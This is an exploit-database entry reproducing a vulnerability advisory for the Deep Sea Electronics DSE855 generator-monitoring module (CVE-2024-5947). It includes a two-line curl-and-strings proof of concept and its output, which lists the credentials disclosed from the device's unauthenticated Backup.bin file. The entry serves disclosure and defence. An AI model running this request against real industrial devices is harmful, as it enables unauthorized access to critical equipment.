Share
## https://sploitus.com/exploit?id=PACKETSTORM:179342
Deep Sea Electronics DSE855 Remote Authentication Bypass  
  
  
Vendor: Deep Sea Electronics plc  
Product web page: https://www.deepseaelectronics.com  
Affected version: Model: DSE855  
Software version: 1.0.26  
Module version: 1.0.78  
Bootloader version: 1.0.3  
Firmware version: 1.1.0  
  
Summary: The DSE855 communications device allows monitoring of a single  
DSE controller with USB connectivity over a LAN or WAN connection. To achieve  
this the DSE855 utilises its in-built web server or MODBUS TCP. In order  
to use over a LAN connection the on-site router must be configured to be  
accessible from any global location.  
  
Desc: The device is vulnerable to configuration disclosure when direct object  
reference is made to the Backup.bin file using an HTTP GET request. This will  
enable an attacker to disclose sensitive information and help her in authentication  
bypass, privilege escalation and full system access.  
  
Tested on: embOS/IP  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2024-5825  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5825.php  
ZDI ID: ZDI-24-671  
ZDI CAN: ZDI-CAN-22679  
ZDI URL: https://www.zerodayinitiative.com/advisories/ZDI-24-671/  
ZDI Title: (0Day) Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability  
CVE ID: CVE-2024-5947  
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-5947  
  
  
10.11.2023  
  
--  
  
  
$ curl -s -O http://target/Backup.bin  
$ strings Backup.bin  
  
DSEB  
Admin  
Password1234  
Tech  
Password1234  
thricer  
scada  
rd1234  
lokna  
xela123  
DSE855